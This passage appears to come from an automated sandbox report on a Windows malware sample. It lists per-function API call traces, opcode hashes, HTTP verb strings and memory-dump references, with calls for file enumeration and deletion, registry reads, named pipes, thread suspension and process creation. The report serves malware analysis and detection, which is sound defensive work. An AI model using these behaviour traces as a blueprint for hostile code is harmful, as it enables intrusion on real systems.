                              0x013e7313
                              0x013e7316
                              0x013e7415
                              0x013e73c9
                              0x013e73c9
                              0x013e73ce
                              0x013e73d9
                              0x013e73db
                              0x00000000
                              0x013e73db
                              0x013e7320
                              0x013e7327
                              0x013e732a
                              0x013e732f
                              0x013e733f
                              0x013e7342
                              0x013e7348
                              0x013e734e
                              0x013e7354
                              0x013e7357
                              0x013e735d
                              0x013e7360
                              0x013e7365
                              0x013e7369
                              0x013e7369
                              0x013e7375
                              0x013e7381
                              0x013e7385
                              0x013e7387
                              0x013e738c
                              0x013e738e
                              0x013e7393
                              0x013e7398
                              0x013e73a5
                              0x013e73ad
                              0x013e73b0
                              0x013e73b0
                              0x013e738c
                              0x00000000
                              0x013e7377
                              0x013e737b
                              0x013e73b2
                              0x013e73b5
                              0x013e73be
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e73be
                              0x013e737d
                              0x00000000
                              0x013e737d
                              0x013e7375

                              APIs
                              • GetTickCount.KERNEL32 ref: 013E7146
                              • wsprintfA.USER32 ref: 013E7196
                              • wsprintfA.USER32 ref: 013E71B3
                              • wsprintfA.USER32 ref: 013E71DF
                              • HeapFree.KERNEL32(00000000,?), ref: 013E71F1
                              • wsprintfA.USER32 ref: 013E7212
                              • HeapFree.KERNEL32(00000000,?), ref: 013E7222
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E7250
                              • GetTickCount.KERNEL32 ref: 013E7261
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E7275
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E7293
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013EA7FB: strcpy.NTDLL ref: 013EA845
                                • Part of subcall function 013EA7FB: lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013EA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                              • StrTrimA.SHLWAPI(00000000,013EC2AC,?,03AD95B0), ref: 013E72CA
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(?), ref: 013E6F85
                                • Part of subcall function 013E6F6D: lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                                • Part of subcall function 013E6F6D: lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E72EB
                              • lstrcpy.KERNEL32(?,?), ref: 013E72F3
                              • lstrcat.KERNEL32(?,?), ref: 013E7301
                              • lstrcat.KERNEL32(?,00000000), ref: 013E7307
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • wcstombs.NTDLL ref: 013E7398
                                • Part of subcall function 013E42E6: SysAllocString.OLEAUT32(?), ref: 013E4327
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • HeapFree.KERNEL32(00000000,?,?), ref: 013E73D9
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 013E73E5
                              • HeapFree.KERNEL32(00000000,?,?,03AD95B0), ref: 013E73F1
                              • HeapFree.KERNEL32(00000000,?), ref: 013E73FD
                              • HeapFree.KERNEL32(00000000,?), ref: 013E7409
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                              • String ID: Uxt
                              • API String ID: 3748877296-1536154274
                              • Opcode ID: df3bc572866a46ae788fea7f9ac6e8dfc9f7ec809732fd948940e626b236e95a
                              • Instruction ID: 84dafcf0cf4e246b1371ddadbd068927d68cf04fa2febace72054f1fc93500d3
                              • Opcode Fuzzy Hash: df3bc572866a46ae788fea7f9ac6e8dfc9f7ec809732fd948940e626b236e95a
                              • Instruction Fuzzy Hash: 90913871900319AFDB21DFA8DC48AAE7FF9EF08358F144065E908EB290D731D955DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01037269, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,010501F4), ref: 010372CB
                              • RtlAllocateHeap.NTDLL(00000000,0104FAE1,?), ref: 01037367
                              • lstrcpyn.KERNEL32(00000000,?,0104FAE1,?,010501F4), ref: 0103737C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,010501F4), ref: 01037397
                              • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,0104FAE0,?,?,010501F4), ref: 0103747E
                              • StrChrA.SHLWAPI(00000001,00000020,?,010501F4), ref: 0103748F
                              • lstrlen.KERNEL32(00000000,?,010501F4), ref: 010374A3
                              • memmove.NTDLL(0104FAE1,?,00000001,?,010501F4), ref: 010374B3
                              • lstrlen.KERNEL32(?,?,00000000,00000000,?,0104FAE0,?,?,010501F4), ref: 010374DF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01037505
                              • memcpy.NTDLL(00000000,?,?,?,010501F4), ref: 01037519
                              • memcpy.NTDLL(0104FAE0,?,?,?,010501F4), ref: 01037539
                              • HeapFree.KERNEL32(00000000,0104FAE0,?,?,?,?,?,?,?,?,010501F4), ref: 01037575
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0103763B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 01037683
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                              • String ID: GET $GET $OPTI$OPTI$POST$PUT
                              • API String ID: 3227826163-647159250
                              • Opcode ID: 5984f442fdeaece335800be3391679e1e7da2b82331bfe2ff3719e0ecd4f62b7
                              • Instruction ID: 9136e0e49f42491c6f2b087b06e2b25fb2931be803e5a7f8dbe9642629dae5d9
                              • Opcode Fuzzy Hash: 5984f442fdeaece335800be3391679e1e7da2b82331bfe2ff3719e0ecd4f62b7
                              • Instruction Fuzzy Hash: 78E18BB5A00205EFDB64CFA8C884BAE7BB9FF44300F148498F995DB294DB71E951DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103F0E3, Relevance: 36.2, APIs: 24, Instructions: 202memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • GetTickCount.KERNEL32 ref: 0103F0F7
                              • wsprintfA.USER32 ref: 0103F148
                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0103F153
                              • QueryPerformanceCounter.KERNEL32(?), ref: 0103F15D
                              • _aulldiv.NTDLL(?,?,?,?), ref: 0103F16F
                              • wsprintfA.USER32 ref: 0103F185
                              • wsprintfA.USER32 ref: 0103F1B1
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F1C3
                              • wsprintfA.USER32 ref: 0103F1E4
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F1F4
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0103F222
                              • GetTickCount.KERNEL32 ref: 0103F233
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103F247
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103F265
                                • Part of subcall function 01030B0F: lstrlen.KERNEL32(00000000,?,00000000,770CC740,74785520,?,?,0103F27A,?,04B3C0E0), ref: 01030B3A
                                • Part of subcall function 01030B0F: lstrlen.KERNEL32(?,?,?,0103F27A,?,04B3C0E0), ref: 01030B42
                                • Part of subcall function 01030B0F: strcpy.NTDLL ref: 01030B59
                                • Part of subcall function 01030B0F: lstrcat.KERNEL32(00000000,?), ref: 01030B64
                                • Part of subcall function 01030B0F: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01030B81
                              • StrTrimA.SHLWAPI(00000000,0104A3F8,?,04B3C0E0), ref: 0103F29C
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 01033EA2: lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                                • Part of subcall function 01033EA2: lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103F2B9
                              • lstrcpy.KERNEL32(?,?), ref: 0103F2C1
                              • lstrcat.KERNEL32(?,?), ref: 0103F2CF
                              • lstrcat.KERNEL32(?,00000000), ref: 0103F2D5
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0103F322
                                • Part of subcall function 0103E7D2: RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103E7DF
                                • Part of subcall function 0103E7D2: RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103E838
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0103F32E
                              • HeapFree.KERNEL32(00000000,?,?,04B3C0E0), ref: 0103F33A
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F346
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F352
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrcatlstrlenwsprintf$lstrcpy$CountEnterLeavePerformanceQueryTickTrim$AllocateCounterFrequency_aulldivstrcpy
                              • String ID:
                              • API String ID: 3299512854-0
                              • Opcode ID: ef7afbfb135cac317a525c9c34da5a285ef2aca2e880926d0f2e7515b598aa5f
                              • Instruction ID: ce0875d6534719bd2963720c02a66969840af3905d6b3e1f57f7742531de3cfc
                              • Opcode Fuzzy Hash: ef7afbfb135cac317a525c9c34da5a285ef2aca2e880926d0f2e7515b598aa5f
                              • Instruction Fuzzy Hash: 47716C7594020AEFDB619FA8DD84EAF7BBAFF88314B154021F588D3128D73AD815CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01039D35, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32 ref: 01039D51
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039D6D
                              • GetLastError.KERNEL32 ref: 01039DBC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039DD2
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039DE6
                              • GetLastError.KERNEL32 ref: 01039E00
                              • GetLastError.KERNEL32 ref: 01039E33
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039E51
                              • lstrlenW.KERNEL32(00000000,?), ref: 01039E7D
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039E92
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 01039F66
                              • HeapFree.KERNEL32(00000000,?), ref: 01039F75
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01039F8A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039F9D
                              • HeapFree.KERNEL32(00000000,?), ref: 01039FAF
                              • RtlExitUserThread.NTDLL(?,?), ref: 01039FC4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: 23e762b00687f2e30f7bfa9b83e4be2cf0a61f57588b08766000281f2ec4dafb
                              • Instruction ID: 843ee0c19a85cda84d5fc4df4ee8e57b0f20f384447aed93ff7153b7dbf0e91b
                              • Opcode Fuzzy Hash: 23e762b00687f2e30f7bfa9b83e4be2cf0a61f57588b08766000281f2ec4dafb
                              • Instruction Fuzzy Hash: EC816BB590020AEFDB609FA8DDC8EAE7BBDFB48344F000069F68593114DB7A8905DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103673A, Relevance: 28.8, APIs: 19, Instructions: 290memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 01036781
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 010367A5
                              • HeapFree.KERNEL32(00000000,?,00000029,00000000,00000000,?), ref: 010367D0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010367FC
                              • HeapFree.KERNEL32(00000000,0104A3F8,0000002A,00000000,00000000,00000000), ref: 01036869
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 010368E1
                              • wsprintfA.USER32 ref: 010368FD
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0103691F
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01036A25
                              • wsprintfA.USER32 ref: 01036A3C
                              • lstrlen.KERNEL32(00000000,00000000), ref: 01036A47
                              • lstrlen.KERNEL32(00000000,00000000), ref: 01036908
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 010369AB
                              • wsprintfA.USER32 ref: 010369C6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 010369D1
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 010369E8
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 01036A0A
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 01036A5E
                              • HeapFree.KERNEL32(00000000,?), ref: 01036A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 334da8eca90e7d556dba3a17f8c4633091e86577cc6e4e42a0a1d8e248d3cadc
                              • Instruction ID: 73c1d69af3c79d4ab01da1e05507251a31536eec1c5f6f494c29c6849266cfa8
                              • Opcode Fuzzy Hash: 334da8eca90e7d556dba3a17f8c4633091e86577cc6e4e42a0a1d8e248d3cadc
                              • Instruction Fuzzy Hash: 0DB177B5900219FFEB619F98CD88AAEBBBDFB48344F104469F681A3214D7365E41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010338B7, Relevance: 28.7, APIs: 19, Instructions: 201memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL ref: 010338EE
                              • wsprintfA.USER32 ref: 01033956
                              • wsprintfA.USER32 ref: 010339A2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010339B9
                              • wsprintfA.USER32 ref: 010339E2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010339F0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01033A0A
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01033A23
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 01033A41
                              • StrTrimA.SHLWAPI(00000000,0104A3F8,00000000,04B3C0E0), ref: 01033A77
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 01033EA2: lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                                • Part of subcall function 01033EA2: lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              • lstrcpy.KERNEL32(00000000,?), ref: 01033A96
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 01033A9D
                              • lstrcat.KERNEL32(00000000,?), ref: 01033AAA
                              • lstrcat.KERNEL32(00000000,?), ref: 01033AB1
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,?), ref: 01033B02
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01033B11
                              • HeapFree.KERNEL32(00000000,00000000,00000000,04B3C0E0), ref: 01033B1C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033B2A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033B35
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrcpywsprintf$AllocateCriticalSectionlstrlen$EnterLeaveTrim
                              • String ID:
                              • API String ID: 3219859236-0
                              • Opcode ID: 74f40fee2cb36fbb29f5fec0cbc86f24986512e485b72dd090f3d83c0fc96289
                              • Instruction ID: 84c5dceaebc1a99454b9731c3c08e2d4ba93009881598bc216c7dfebef3e4b2b
                              • Opcode Fuzzy Hash: 74f40fee2cb36fbb29f5fec0cbc86f24986512e485b72dd090f3d83c0fc96289
                              • Instruction Fuzzy Hash: 05718975640306EFD3A1AF18DD84F1B7BE9FB88310F050429F5C897269C77AA814CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F601, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0102F616
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                                • Part of subcall function 0103F63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                                • Part of subcall function 0103F63F: RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 0103F63F: RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F826
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0102F672
                              • memcpy.NTDLL(00000000,?,00000000), ref: 0102F685
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0102F69C
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F8D2
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F8E4
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F8FF
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0102F6C7
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 0102F6DF
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102F739
                              • lstrlenW.KERNEL32(00000000,?), ref: 0102F75C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102F76E
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0102F7E2
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F7F2
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0102F81B
                              • lstrlenW.KERNEL32(010517D4,?), ref: 0102F895
                              • DeleteFileW.KERNEL32(?,?), ref: 0102F8C3
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F8D1
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F8F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
                              • Opcode ID: deb7cfab42ee2d0b9791a59e82c46c7e0e69441d7573636191b1c246315f25e6
                              • Instruction ID: ed2e5ac6b32b69df2a107d5665a0cde4f072e4c1d3784341f1d343a4b7725a6c
                              • Opcode Fuzzy Hash: deb7cfab42ee2d0b9791a59e82c46c7e0e69441d7573636191b1c246315f25e6
                              • Instruction Fuzzy Hash: BC913AB554022AAFDB60DFA4DCC8DEFBBBCFB08380B040466F685D7119E6759945CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102D8D8, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0102D8FA
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0102D917
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0102D967
                              • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0102D971
                              • GetLastError.KERNEL32 ref: 0102D97B
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102D98C
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0102D9AE
                              • HeapFree.KERNEL32(00000000,?), ref: 0102D9E5
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0102D9F9
                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0102DA02
                              • SuspendThread.KERNEL32(?), ref: 0102DA11
                              • CreateEventA.KERNEL32(01050244,00000001,00000000), ref: 0102DA25
                              • SetEvent.KERNEL32(00000000), ref: 0102DA32
                              • CloseHandle.KERNEL32(00000000), ref: 0102DA39
                              • Sleep.KERNEL32(000001F4), ref: 0102DA4C
                              • ResumeThread.KERNEL32(?), ref: 0102DA70
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                              • String ID:
                              • API String ID: 1011176505-0
                              • Opcode ID: 131457605d5ed43f2212752ca3f2cee484d4cb8ae05de60f7fccd20ea82e55c1
                              • Instruction ID: c13591b72cf20958f59180cf3000921fb2d6c6a8674211aadac6fd0a12a115c8
                              • Opcode Fuzzy Hash: 131457605d5ed43f2212752ca3f2cee484d4cb8ae05de60f7fccd20ea82e55c1
                              • Instruction Fuzzy Hash: 504162B6A0021AEFDF609FD8D9C89AEBBBAFB05304B144069F682D3118C73A5D54CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01022E6B, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01022E99
                              • StrChrA.SHLWAPI(?,0000000D), ref: 01022EDF
                              • StrChrA.SHLWAPI(?,0000000A), ref: 01022EEC
                              • StrChrA.SHLWAPI(?,0000007C), ref: 01022F13
                              • StrTrimA.SHLWAPI(?,0104C49C), ref: 01022F28
                              • StrChrA.SHLWAPI(?,0000003D), ref: 01022F31
                              • StrTrimA.SHLWAPI(00000001,0104C49C), ref: 01022F47
                              • _strupr.NTDLL ref: 01022F4E
                              • StrTrimA.SHLWAPI(?,?), ref: 01022F5B
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 01022FA3
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000001), ref: 01022FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: 545ea82168199a2173acc2ae7917cd4ccba8d06f28823cb4bf4966208bf8a78b
                              • Instruction ID: 5b6875a871b943835adb3e668b8beb15a576d97337cc17b03d88f0c465f8031f
                              • Opcode Fuzzy Hash: 545ea82168199a2173acc2ae7917cd4ccba8d06f28823cb4bf4966208bf8a78b
                              • Instruction Fuzzy Hash: 4341D0B15043569FE7A1AF6C8D84F6BBBE8AF98200F040869F9D5DB241EB74D5048B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0104339E, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 010433B3
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                              • wcstombs.NTDLL ref: 010433F6
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                              • TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                              • GetLastError.KERNEL32 ref: 01043481
                              • GetExitCodeProcess.KERNEL32(?,00000001), ref: 010434A1
                              • CloseHandle.KERNEL32(?), ref: 010434B0
                              • CloseHandle.KERNEL32(?), ref: 010434B5
                              • GetLastError.KERNEL32 ref: 010434B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                              • String ID: D
                              • API String ID: 2463014471-2746444292
                              • Opcode ID: b00f6c2c2b317200b4df36fb0d2d9535ef4eec563accf75279d71b7b26469fc0
                              • Instruction ID: 3900162555dfe04269b5e1c65125c45017e54671a9a99ba5dad7bd2969601cb4
